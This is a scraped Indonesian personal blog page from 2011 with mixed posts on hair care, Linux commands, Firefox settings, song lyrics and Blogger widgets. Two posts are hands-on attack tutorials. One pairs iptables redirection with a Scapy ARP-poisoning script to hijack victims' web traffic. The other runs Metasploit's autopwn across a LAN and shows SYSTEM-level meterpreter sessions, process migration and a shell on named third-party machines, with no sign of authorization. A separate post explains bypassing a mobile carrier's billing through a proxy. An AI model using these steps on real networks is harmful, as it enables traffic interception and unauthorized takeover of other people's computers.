23 October 2011

Art #3

1

Click toRead More

Art #2

1

NGAREP MANTAN YANG DI DALEM MOBIL!!
Click toRead More

22 October 2011

Traffic Exchange | Facebook Group

1


This group created to facilitate the exchange of links with bloggers.
more friends you invite, the more you get traffic.
we hope we can work together for the betterment of our community.

© 2011 | Indonesia and Malaysia Blogger

Join Now!
Click toRead More

Cara Membuat Rambut Lurus Alami

1

rambut adalah mahkota kecantikan ya? ia dong? ini aku ada sedikit ilmu buat biar rambut lurus..

ramuan :
  • ambilah beberapa daun seledri segar (kalau ga punya beli aja gan di warung)

  • lalu tumbuk daun seledri itu,kasih air sedikit. (biar cepet di blender aja)

  • seledri yang udah di tumbuk/blender , peras dan ambil sarinya.

  • simpan sari seledri itu, diamkan sehari.


  • cara pake :
    pagi pas mandi , balurkan air seledri yang telah di diamkan sehari itu ke seluruh rambut , di pijit-pijit supaya merata ke kuliat kepala, setelah itu bilas, jangan lupa keramas untuk menghilangkan bau dari seledri itu..
    Click toRead More

    DNS Spoofing Dengan Scapy

    0

    Aku mau share cara nya DNS Spofing Dengan Scapy..

    Yang harus di siapin :
    OS Linux yang udah terinstal Scapy ama pyton

    Konfigurasinya :
  • yang pertama harus di lakukan adalah IP forwading.
    echo 1 > /proc/sys/net/ipv4/ip_forward


  • terus non aktivin ICMP redirect.
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects


  • terus IP tables setting

    iptables –flush
    iptables –zero
    iptables –delete-chain
    iptables -F -t nat

    iptables –append FORWARD –in-interface wlan0/eth0 –jump ACCEPT
    iptables –table nat –append POSTROUTING –out-interface wlan0/eth0 –jump MASQUERADE
    iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination 10.42.43.23
    iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination 10.42.43.23


  • ini bash scriptnya, biar ga usah ngetik lagi di console.
    #!/bin/sh
    INTERFACE=”wlan0″ #cek interface dg mengetikan ifconfig di terminal
    SERVERWEB=’10.42.43.23′ #ip ente

    echo 1 > /proc/sys/net/ipv4/ip_forward
    echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects

    #clear rule..
    iptables –flush
    iptables –zero
    iptables –delete-chain
    iptables -F -t nat

    iptables –append FORWARD –in-interface $INTERFACE –jump ACCEPT
    iptables –table nat –append POSTROUTING –out-interface $INTERFACE –jump MASQUERADE

    #rendirect traffic.. on my server/proxy
    iptables -t nat -A PREROUTING -p tcp –dport 80 –jump DNAT –to-destination $SERVERWEB
    iptables -t nat -A PREROUTING -p tcp –dport 443 –jump DNAT –to-destination $SERVERWEB

    save dengan extensi .sh


  • terus kode pytonnya
    from scapy.all import *;
    from time import sleep;
    conf.iface=’wlan0′;#network card

    target=”10.42.43.1″;#target /victim

    router=”10.42.43.1″;#routernya

    packet = ARP(); #bikin packet :P

    packet.psrc = router # Gateway

    packet.pdst = target # victim v.v

    try:
    while 1:
    send(packet, verbose=0);
    sleep(50);
    except:
    pass

    save dengan extensi .py


  • sekarang kita lakukan penyesuaian.
    INTERFACE=”wlan0″ (cek interface dengan ifconfig di terminal)
    SERVERWEB=’10.42.43.23′ #ip ente

    network card yang konek dengan internet serta ip lokal kamu
    &
    target=”10.42.43.19″;#target /victim

    router=”10.42.43.1″;#routernya

    kalau ingin semua permintaan paket client berpindah ke web server kamu
    target=”10.42.43.19/24″;#target /victim

    dengan begitu semua IP lokal client akan di alihkan ke IP local kamu…:D


  • eksekusi :
    ichamedusa@359imbox:~$/home/ichamedusa$ ./nama.sh
    ichamedusa@359imbox:~$/home/ichamedusa$ python nama.py
    Click toRead More

    21 October 2011

    Nokia Edisi Nelepon Gratis

    0



    Handphone Nokia terbaru cocok sekali untuk kantong pelajar di mana kita bisa telepon gratis.
    Edisi terbatas,(di rilis untuk percobaan)
    Dapatkan dengan cepat!!
    Click toRead More

    Art #1 Cinta

    0

    Click toRead More

    Perintah Dasar Console Linux

    0

    1. ls , adalah perintah untuk menampilkan isi direktori.
      beberapa variasi dari ls:
      ls -r menampilkan direktori dan isinya.
      ls -m menampilkan file dengan koma sebagai pembagi
      ls -a menampilkan file dan file yang tersembunyi
      ls *.txt menampilkan file dengan ekstensi
      ls – -colour menampilkan file dan direkstori dengan perbedaan warna.

    2. cd digunakan untuk pindah direktori,
      cd [direktori yang dituju]

    3. find adalah perintah mencari file,
      find [direktori] [opsi] [aksi]

    4. rm adalah perintah menghapus file
      rm [nama file]

    5. cp adalah perintah menyalin file dan direktori.
      cp [file sumber] [file_target/ direktori]

    6. mv adalah perintah mengganti nama file dan memindahkan file.
      mengganti file : mv [filesumber] [file target] dalam satu direktori
      memindahkan file : mv [file sumber] [direktori target]

    7. mkdir adalah perintah untuk membuat direktori.
      mkdir [nama direktori]

    8. who am i adalah perintah untuk mengetahui siapa kita user atau super user.

    9. whereis mencari tahu keberadaan file – file tertentu misal kernel, .conf dll.
      whereis [namafile]


    10. Kalo ada kurangnya tambah di komentar aja yah..
    Click toRead More

    Cara Kerja Mesin ATM

    0

    Buat yang mau tau cara kerja mesin ATM kurang lebih seperti gambar di pinggir. :D
    Click toRead More

    20 October 2011

    Cara Mempercepat Mozilla Firefox

    1

    Ini aku mau share cara mempercepat broswer Mozilla Firefox
    1. Install Fastestfox dan Fasterfoxx Extra (Cari di Add-Ons Mozilla Firefox)





























    2. Pada URL bar, ketik “about:config” terus teken enter.

    3. Dobel klik settingan dibawah ini terus isiin nilainya.
      (Untuk nilai “true / false booleans” dbel klik langsung pada nama settingannya dan langsung berubah seketika).

    4. Kode:

      browser.tabs.showSingleWindowModePrefs – true
      network.http.max-connections – 48
      network.http.max-connections-per-server – 16
      network.http.max-persistent-connections-per-proxy – 8
      network.http.max-persistent-connections-per-server – 4
      network.http.pipelining – true
      network.http.pipelining.maxrequests – 100
      network.http.proxy.pipelining – true
      network.http.request.timeout – 300
      nglayout.initialpaint.delay – 0
      browser.display.show_image_placeholders – false


    5. Install fastun (Addons mozilla firefox yg bekerja seperti onspeed)

    6. Tekan F5 enter terus Restart PC !
    Click toRead More

    17 October 2011

    Cara Cepat Mendapat Teman Di Facebook *50F/H

    1


    aku mau share cara cepet mendapat teman di facebook, 50 temen/hari.
    enak dong yah? ia dong? biar cepet exist dan famous teman..

    caranya komen di bawah post ini tinggalin link facebooknya.
    jangan lupa add aku juga yah.
    http://www.facebook.com/ichamedusa
    Click toRead More

    Kelebihan dan Kekurangan handphone Android

    2

    Sistem Operasi Google Android di Ponsel memang masih tergolong baru, namun demikian Sistem Operasi Android telah mengalami perkembangan yang cukup pesat. Diciptakan sebagai tandingan iOS, Android menunjukan grafik perkembangan yang signifikan, ini tentu tidak terlepas dari dukungan-dukungan pabrikan ponsel besar yang ikut menghadirkan ponsel-ponsel bersistem operasi Android.

    Kelebihannya

    1. Multitasking – Yups, ponsel Android bisa menjalankan berbagai aplikasi, itu artinya Agan bisa browsing, Facebookan sambil dengerin lagu.

    2. Kemudahan dalam Notifikasi – Setiap ada SMS, Email, atau bahkan artikel terbaru dari RSS Reader, akan selalu ada notifikasi di Home Screen Ponsel Android, tak ketinggalan Lampu LED Indikator yang berkedip-kedip, sehingga Agan tidak akan terlewatkan satu SMS, Email ataupun Misscall sekalipun.

    3. Akses Mudah terhadap Ribuan Aplikasi Android lewat Google Android App Market – Kalau Agan seneng install aplikasi ataupun games, lewat Google Android App Market, Agan bisa mendownload berbagai aplikasi dengan gratis. Ada banyak ribuan aplikasi dan games yang siap untuk Agan download di ponsel Android.

    4. Pilihan Ponsel yang beranekaragam - Bicara ponsel Android, akan terasa ‘beda’ dibandingkan dengan iOS, jika iOS hanya terbatas pada iPhone dari Apple, maka Android tersedia di ponsel dari berbagai produsen, mulai dari Sony Ericsson, Motorola, HTC sampai Samsung. Dan setiap pabrikan ponsel pun menghadirkan ponsel Android dengan gaya masing-masing, seperti Motorola dengan Motoblur-nya, Sony Ericsson dengan TimeScape-nya. Jadi Agan bisa leluasa memilih ponsel Android sesuai dengan ‘merk’ favorite.

    5. Bisa menginstal ROM yang dimodifikasi – tak puas dengan tampilan standar Android, jangan khawatir ada banyak Costum ROM yang bisa Agan pakai di ponsel Android.

    6. Widget – benar sekali, dengan adanya Widget di homescreen, Agan bisa dengan mudah mengakses berbagai setting dengan cepat dan mudah.

    7. Google Maniak – Jika Agan pengguna setia layanan Google mulai dari Gmail sampai Google Reader, ponsel Android telah terintegrasi dengan layanan Google, sehingga Agan bisa dengan cepat mengecek email dari gMail.

    Kekurangannya

    Tak bisa dipungkiri disamping kelebihan tentu saja ada kekurangan dari sistem operasi Android ini.

    1. Koneksi Internet yang terus menerus – Yups, kebanyakan ponsel Android memerlukan koneksi internet yang simultan alias terus menerus aktif. itu artinya Agan harus siap berlangganan paket GPRS yang sesuai dengan kebutuhan.

    2. Iklan – Aplikasi di Ponsel Android memang bisa didapatkan dengan mudah dan gratis, namun konsekuensinya di setiap Aplikasi tersebut, akan selalu Iklan yang terpampang, entah itu bagian atas atau bawah aplikasi.
    Click toRead More

    DizTroYa - mY pRide Lirik

    0

    for my family, yo diztroyer
    mama dengarkan ku ingin berbicara
    walaupun susah, ku akan cari banyak cara
    karena kurasa ku begitu banyak salah
    ku banyak membangkang pada dirimu oh mama

    mama kau malaikat dalam hidupku
    kalau kelu kesah ku curahkan hanya padamu
    sosok wajahmu selalu terbayang di benaku
    kesalahan ku takan terhitung tiap waktu

    mama begitu banyak semua pengorbanan
    membelaku dari cacian dan hinaan
    kau lindungiku dari berbagai ancaman
    memelukku erat dan sedikit kecupan hangat

    mama sering sekali aku melawanmu
    padahal kau begitu buat kebaikanku
    tapi ku tak pernah mengerti dan menyapamu
    dan sekarang ku ingin meminta maaf mu

    I can fly
    I'm proud that I can fly
    To give the best of mine
    Till the end of the time
    Believe me I can fly
    I'm proud that I can fly
    To give the best of mine
    The heaven in the sky

    papa ku buat lagu ini juga untukmu
    karena ku ini yang sering malawanmu
    namun sangatlah sering membuatmu marah
    dan akulah anak yang tidak pernah jera

    ku membangkangmu, ku melawanmu, hingga akhirnya kau kesal padaku
    sering sekali dalam benakku ingin kabur
    karena akulah anak yang tak mau diatur

    tapi kini kusadar kau sayang padaku
    karena kau membanting tulang hanya untukku
    hanya kaulah tulang punggung dalam keluarga
    bekerja penuh hingga kau hauskan dahaga

    aku puang malam pun kau menjemputku
    tanpa pikirkan kelelahan dalam tubuhmu
    dan kini tahu kau sangat ingin menjagaku
    dari apapun yang akan terjadi padaku


    I can fly
    I'm proud that I can fly
    To give the best of mine
    Till the end of the time
    Believe me I can fly
    I'm proud that I can fly
    To give the best of mine
    The heaven in the sky


    kaka kaka ku dengarkan ini untukmu
    aku adikmu yang selalu merepotkanmu
    karenaku kalian yang kena marah
    karenaku kalian yang harus mengalah

    ku tak tau bagaimana harus kemana
    kalian yang selalu memberi ku amanah
    kalian yang mengajariku agar aku terarah
    tak sedikitpun membuat kalian marah

    dan adiku yang kecil yang sangat nakal
    maafkan kakamu ini memang brutal
    sering sekali menimpukmu dengan bantal
    tapi hanya kaulah adiku yang ku sayang

    hidupku takkan lengkap tanpa kalian
    aku ingin ucapkan terimakasih untuk kalian
    hanya kalianlah yang satusatunya berlian
    yang ada dalam hatiku takkan tergantikan


    I can fly
    I'm proud that I can fly
    To give the best of mine
    Till the end of the time
    Believe me I can fly
    I'm proud that I can fly
    To give the best of mine
    The heaven in the sky

    i love you mam, i love you dad, i love my family, miss you all

    OST DizTroYa
    Click toRead More

    15 October 2011

    Cara Internetan Pake Smart Gratis

    0

    Aku mau share nih cara internetan pake modem smart gratiss, langsung aja ya..

    Siapin dulu :
    1. ISPCE

    2. ANTI IDLI (gunanya biar ga sering keputus)


    Caranya :

    pertama ganti dial up dulu
    username : wap
    pas : wap
    number : #777
    save

    terus di dial up wap klik kanan ->propertis -> networking -> dobel klik internet protokol [tcp/ip]
    -> ganti prefared DNS server 8.8.8.8
    alternatte DNS server : 8.8.4.4
    klik ok

    instal ISPCE sampai selesai

    terus install ANTI IDLI

    buka ISPCE centang Use Query, Use Proxy, Query Mode
    listen prontnya masukin 8088
    front query isi dengan : wap.smartfren.co.id@
    proxy tipe : no proxy
    proxy server : 66.29.36.95 port 554/1745
    : 10.20.27.250 port 8080
    kalo udah langsung refresh

    terus buka ANTI IDLI
    tekan enable biar bekerja sebelum di konekin

    terus setting mozila
    tekan tool -> options -> network -> setting -> centang manual proxy configuration -> masukan proxy ini 127.0.0.1 port 8088
    centang sock v5 -> localhost, 127.0.0.1

    udah selese deh, happy browsing :D *gak bisa buat facebook
    Click toRead More

    14 October 2011

    Exploitasi Otomatis Metaspl0it

    0

    Pasti kalo yang doyan hacking gak asing lagi sama kata yang satu ini, yup Metaspl0it.
    Sekarang aku mau share exploitasi otomatis dengan metasploit, jadi biar metaspl0it yang cari target beserta exploitnya. enak dong? ia dong?
    Ikutin langkah langkah di bawah :

    Install dulu postgresql, cz disini kita bakal gunain db_driver postgresql di Metaspl0it .

    ichamedusa@359imbox:~$ sudo apt-get install postgresql
    ichamedusa@359imbox:~$ sudo apt-get install libpgsql-ruby


    Setelah Postgresql terinstall, buat user dan database terlebih dahulu untuk dikoneksikan dengan Metaspl0it

    ichamedusa@359imbox:~$ sudo su postgres


    createuser namauser -P (-P untuk memberi password pada user)

    ichamedusa@359imbox:/home/ichamedusa$ createuser ichamedusa -P
    Enter password for new role: [masukkan password user]
    Enter it again: [masukkan password user 1x lagi]
    Shall the new role be a superuser? (y/n) Y


    User udah jadi terus siapin databasenya buat Pentest
    createdb --owner=user nama_database

    Jalanin Postgersqlnya..

    postgres@359imbox:/home/ichamedusa$/etc/init.d/postgresql-8.4 start


    Oke semua persiapan uda beres, sekarang tinggal menyuruh si Metaspl0it nyari tumbal. akwkwkwkwkw

    postgres@359imbox:/home/ichamedusa$sudo msfconsole


    pake driver Postgresql, terus konekin ama database yang yang uda di buat tadi.

    msf > db_driver postgresql


    // db_connect user:password@localhost/nama_database


    msf > db_connect scr3am:150787@127.0.0.1/msf_auto_pwn


    Sekarang tinggal atur range IP yang bakal kita Exploitasi, kalo aku cari target dengan port 445 (buat mempersempit target pencarian aja)
    cara scanning ini bisa bervariasi tergantung kreatifitas dan kebutuhan.

    msf > db_nmap -p 445 172.17.12.0-100
    [*] Nmap: Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-09-07 13:20 WIT
    [*] Nmap: Nmap scan report for 172.17.12.13
    [*] Nmap: Host is up (0.012s latency).
    [*] Nmap: PORT STATE SERVICE
    [*] Nmap: 445/tcp open microsoft-ds
    [*] Nmap: Nmap scan report for 172.17.12.16
    [*] Nmap: Host is up (0.014s latency).
    [*] Nmap: PORT STATE SERVICE
    [*] Nmap: 445/tcp open microsoft-ds
    [*] Nmap: Nmap scan report for 172.17.12.18
    [*] Nmap: Host is up (0.016s latency).
    [*] Nmap: PORT STATE SERVICE
    [*] Nmap: 445/tcp open microsoft-ds
    [*] Nmap: Nmap scan report for 172.17.12.39
    [*] Nmap: Host is up (0.023s latency).


    biarin jalan.

    msf > db_autopwn -e -q -p
    [*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 5 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 4 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 3 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 1 launched modules to finish execution...
    [*] (175/175 [2 sessions]): Waiting on 0 launched modules to finish execution...


    ok, uda selese.

    msf > sleep 5
    msf > jobs -K
    msf > sessions -l

    Active sessions
    ===============

    Id Type Information Connection
    -- ---- ----------- ----------
    1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ KOMINFO-DFE1227 172.17.42.2:41031 -> 172.17.12.146:4793
    2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ RINA_PUNYA 172.17.42.1:55416 -> 172.17.12.70:10811

    msf > session -i 1
    [*] Starting interaction with 1...


    dapet dua pemirsa..

    meterpreter > sysinfo
    System Language : en_US
    OS : Windows XP (Build 2600, Service Pack 2).
    Computer : KOMINFO-DFE1227
    Architecture : x86
    Meterpreter : x86/win32


    wew, teernyata Windows XP SP 2 pemirsa, kita liat deh task nya..

    1112  svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
    1324 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    1360 explorer.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\Explorer.EXE
    1464 AvastUI.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\AVAST Software\Avast\avastUI.exe
    1476 igfxtray.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxtray.exe
    1484 hkcmd.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\hkcmd.exe
    1492 igfxpers.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxpers.exe
    1504 BJMYPRT.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Canon\MyPrinter\BJMyPrt.exe
    1548 igfxsrvc.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\igfxsrvc.exe
    1604 devices.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Innovative Solutions\DriverMax\devices.exe
    164 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
    2200 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
    2600 firefox.exe x86 0 KOMINFO-DFE1227\lina C:\Program Files\Mozilla Firefox\firefox.exe
    3156 wscntfy.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wscntfy.exe
    3172 wuauclt.exe x86 0 KOMINFO-DFE1227\lina C:\WINDOWS\system32\wuauclt.exe
    3204 EXCEL.EXE x86 0 KOMINFO-DFE1227\lina C:\Program Files\Microsoft Office\Office12\EXCEL.EXE


    Saatnya pindah ke explorer.exe dengan cara migrate PID.

    meterpreter > migrate 1360
    [*] Migrating to 1360...
    [*] Migration completed successfully.

    meterpreter > shell
    Process 1932 created.
    Channel 1 created.
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Documents and Settings\lina>


    kalo udah gini mau ngapain lagi hayooo?
    Click toRead More

    Ini Akhir Atau Awal Hidup?

    0

    Pada awalnya semua baik-baik saja sampai sesampainya di jogjakarta ngeratau nyoba buat ngelamar kerja, dan damn!! gak keterima, belum selesai satu masalah masalah lain datang, dan sekarang hidup bebas layaknya burung :D
    entah ini awal atau akhir tapi yang jelas aku yakin tuhan pasti memberikan jalan yang terbaik..
    Click toRead More

    Black Stocking - This October

    0

    Click toRead More

    Cara Membuat Syntax Highlighter Pada Blogger

    1

    Ini aku mau share widget keren "Syntax Highlighter" buat para blogger.
    CATATAN - MOHON BACKUP UNTUK BLOG ANDA SEBELUM MELAKUKAN INI.

    Ikutin langkah-langkah di bawah buat masang widgetnya:

    1. Masuk ke account Blogger kamu, pilih "Design" terus "Edit HTML"

    2. Cari kode ]]></b:skin>

    3. Copy paste kode di bawah di atas kode ]]></b:skin>

    4. .dp-highlighter
      {
      font-family: "Consolas", "Monaco", "Courier New", Courier, monospace;
      font-size: 12px;
      background-color: #E7E5DC;
      width: 99%;
      overflow: auto;
      margin: 18px 0 18px 0 !important;
      padding-top: 1px; /* adds a little border on top when controls are hidden */
      }

      /* clear styles */
      .dp-highlighter ol,
      .dp-highlighter ol li,
      .dp-highlighter ol li span
      {
      margin: 0;
      padding: 0;
      border: none;
      }

      .dp-highlighter a,
      .dp-highlighter a:hover
      {
      background: none;
      border: none;
      padding: 0;
      margin: 0;
      }

      .dp-highlighter .bar
      {
      padding-left: 45px;
      }

      .dp-highlighter.collapsed .bar,
      .dp-highlighter.nogutter .bar
      {
      padding-left: 0px;
      }

      .dp-highlighter ol
      {
      list-style: decimal; /* for ie */
      background-color: #fff;
      margin: 0px 0px 1px 45px !important; /* 1px bottom margin seems to fix occasional Firefox scrolling */
      padding: 0px;
      color: #5C5C5C;
      }

      .dp-highlighter.nogutter ol,
      .dp-highlighter.nogutter ol li
      {
      list-style: none !important;
      margin-left: 0px !important;
      }

      .dp-highlighter ol li,
      .dp-highlighter .columns div
      {
      list-style: decimal-leading-zero; /* better look for others, override cascade from OL */
      list-style-position: outside !important;
      border-left: 3px solid #6CE26C;
      background-color: #F8F8F8;
      color: #5C5C5C;
      padding: 0 3px 0 10px !important;
      margin: 0 !important;
      line-height: 14px;
      }

      .dp-highlighter.nogutter ol li,
      .dp-highlighter.nogutter .columns div
      {
      border: 0;
      }

      .dp-highlighter .columns
      {
      background-color: #F8F8F8;
      color: gray;
      overflow: hidden;
      width: 100%;
      }

      .dp-highlighter .columns div
      {
      padding-bottom: 5px;
      }

      .dp-highlighter ol li.alt
      {
      background-color: #FFF;
      color: inherit;
      }

      .dp-highlighter ol li span
      {
      color: black;
      background-color: inherit;
      }

      /* Adjust some properties when collapsed */

      .dp-highlighter.collapsed ol
      {
      margin: 0px;
      }

      .dp-highlighter.collapsed ol li
      {
      display: none;
      }

      /* Additional modifications when in print-view */

      .dp-highlighter.printing
      {
      border: none;
      }

      .dp-highlighter.printing .tools
      {
      display: none !important;
      }

      .dp-highlighter.printing li
      {
      display: list-item !important;
      }

      /* Styles for the tools */

      .dp-highlighter .tools
      {
      padding: 3px 8px 3px 10px;
      font: 9px Verdana, Geneva, Arial, Helvetica, sans-serif;
      color: silver;
      background-color: #f8f8f8;
      padding-bottom: 10px;
      border-left: 3px solid #6CE26C;
      }

      .dp-highlighter.nogutter .tools
      {
      border-left: 0;
      }

      .dp-highlighter.collapsed .tools
      {
      border-bottom: 0;
      }

      .dp-highlighter .tools a
      {
      font-size: 9px;
      color: #a0a0a0;
      background-color: inherit;
      text-decoration: none;
      margin-right: 10px;
      }

      .dp-highlighter .tools a:hover
      {
      color: red;
      background-color: inherit;
      text-decoration: underline;
      }

      /* About dialog styles */

      .dp-about { background-color: #fff; color: #333; margin: 0px; padding: 0px; }
      .dp-about table { width: 100%; height: 100%; font-size: 11px; font-family: Tahoma, Verdana, Arial, sans-serif !important; }
      .dp-about td { padding: 10px; vertical-align: top; }
      .dp-about .copy { border-bottom: 1px solid #ACA899; height: 95%; }
      .dp-about .title { color: red; background-color: inherit; font-weight: bold; }
      .dp-about .para { margin: 0 0 4px 0; }
      .dp-about .footer { background-color: #ECEADB; color: #333; border-top: 1px solid #fff; text-align: right; }
      .dp-about .close { font-size: 11px; font-family: Tahoma, Verdana, Arial, sans-serif !important; background-color: #ECEADB; color: #333; width: 60px; height: 22px; }

      /* Language specific styles */

      .dp-highlighter .comment, .dp-highlighter .comments { color: #008200; background-color: inherit; }
      .dp-highlighter .string { color: blue; background-color: inherit; }
      .dp-highlighter .keyword { color: #069; font-weight: bold; background-color: inherit; }
      .dp-highlighter .preprocessor { color: gray; background-color: inherit; }

    5. sekarang cari kode </head>

    6. Copy paste kode di bawah di atas kode </head>

    7. <!-- Add-in CSS for syntax highlighting -->
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shCore.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushCpp.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushCSharp.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushCss.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushDelphi.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushJava.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushJScript.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushPhp.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushPython.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushRuby.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushSql.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushVb.js' type='text/javascript'></script>
      <script src='http://syntaxhighlighter.googlecode.com/svn/trunk/Scripts/shBrushXml.js' type='text/javascript'></script>

    8. sekarang cari kode </body>

    9. Copy paste kode di bawah di atas kode </body>

    10. <!-- Add-in Script for syntax highlighting -->
      <script language='javascript'>
      dp.SyntaxHighlighter.BloggerMode();
      dp.SyntaxHighlighter.HighlightAll('code');
      </script>

    11. kalo uda selesai klik "SAVE"

    12. tiap kamu mau nulis script kamu harus masukin kode di post kamu, klik tab "Edit HTML" dari editor posting kamu dan tulis kode berikut:

    13. <pre name="code" class="cpp">
      "tulis script kamu di sini"
      </pre>

    14. sekarang widgetnya udah di pasang di blog kamu *cogratulations
    Click toRead More

    Cara Membuat Slide Buku Tamu Di Pinggir

    5

    Ini aku mau share cara buat buku tamu yang slide, bisa di buka dan di tutup.

    1. Masuk ke account Blogger kamu, pilih "Layout" terus "Page Elements".

    2. Klik "Add a Gadget", terus pilih "HTML/JavaScript".

    3. Copy-paste kode di bawah ini:



















    4. Kalo udah selesai tinggal di "Save"
    Click toRead More

    Blog Baruku

    0

    Hoams.. Setelah daftar, ngatur template, ngatur widget dan tektek bengek lainya jadi juga ini blog. alhamdulilah yah sesuatu banget.
    gak banyak temen, hidup juga gak begitu bagus. mikir buat bikin blog teriakin exsistensi biar ga bisa ngerubah ini negara bodoh seengganya bisa ngerubah hidup lah *i hope so.
    mudah-mudahan aja semua PR blog nya kelar..
    Click toRead More

    Advertise